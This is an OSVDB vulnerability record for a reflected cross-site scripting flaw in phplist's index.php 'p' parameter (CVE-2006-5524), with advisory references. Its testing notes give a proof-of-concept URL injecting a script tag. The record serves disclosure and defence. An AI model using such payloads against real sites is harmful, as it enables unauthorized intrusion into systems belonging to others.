phplist index.php p Variable XSS

2006-10-16T07:33:51
ID OSVDB:29732
Type osvdb
Reporter OSVDB
Modified 2006-10-16T07:33:51

Description

Manual Testing Notes

http://[target]/phplist/index.php?p="><script>alert(1);</script>

References:

Vendor URL: http://www.phplist.com/ Security Tracker: 1017102 Secunia Advisory ID:22431 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0265.html FrSIRT Advisory: ADV-2006-4084 CVE-2006-5524 Bugtraq ID: 20577